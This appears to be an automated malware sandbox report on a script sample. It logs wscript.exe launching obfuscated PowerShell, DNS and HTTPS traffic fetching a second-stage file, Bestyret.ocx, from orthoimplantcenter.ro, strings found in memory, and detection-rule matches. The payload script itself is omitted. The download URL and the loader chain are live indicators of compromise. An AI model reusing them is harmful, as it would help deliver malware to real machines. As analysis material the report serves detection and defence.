Source: Submitted Sample |
Integrated Neural Analysis Model: Matched 99.2% probability |
Source: unknown |
HTTPS traffic detected: 188.241.183.45:443 -> 192.168.2.11:49706 version: TLS 1.2 |
Source: |
Binary string: m.Core.pdbk source: powershell.exe, 00000007.00000002.2864093210.0000000008588000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: global traffic |
HTTP traffic detected: GET /Bestyret.ocx HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: orthoimplantcenter.ro
Connection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
DNS traffic detected: DNS query: gormezl_6777.6777.6777.677e |
Source: global traffic |
DNS traffic detected: DNS query: orthoimplantcenter.ro |
Source: powershell.exe, 00000007.00000002.2864093210.0000000008570000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000001.00000002.1564405714.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562697497.000001B46EDAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1563518584.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab: |
Source: wscript.exe, 00000001.00000003.1555385159.000001B46EE0A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?91b5065270408 |
Source: wscript.exe, 00000001.00000003.1554978924.000001B470C57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1555631445.000001B470C57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1554448292.000001B470C57000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabl |
Source: wscript.exe, 00000001.00000002.1564405714.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562697497.000001B46EDAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1563518584.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmexol |
Source: wscript.exe, 00000001.00000002.1564405714.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562697497.000001B46EDAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1563518584.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enj |
Source: wscript.exe, 00000001.00000003.1555506674.000001B46EE32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1555385159.000001B46EE0A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?91b5065270 |
Source: powershell.exe, 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000004.00000002.1684347363.000001DE8B6D1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://orthoimplantcenter.ro |
Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000004.00000002.1684347363.000001DE89951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2833765979.0000000004D71000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000004.00000002.1710822472.000001DEA2092000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://wicroft.com |
Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000004.00000002.1684347363.000001DE89951000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000007.00000002.2833765979.0000000004D71000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB_q |
Source: powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000004.00000002.1684347363.000001DE8AD57000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000004.00000002.1684347363.000001DE89B78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1684347363.000001DE8B300000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://orthoimplantcenter.ro |
Source: powershell.exe, 00000004.00000002.1684347363.000001DE89B78000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://orthoimplantcenter.ro/Bestyret.ocxP |
Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://orthoimplantcenter.ro/Bestyret.ocxXR1lX |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: amsi32_8028.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 8028, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument, truncated in the report, omitted] |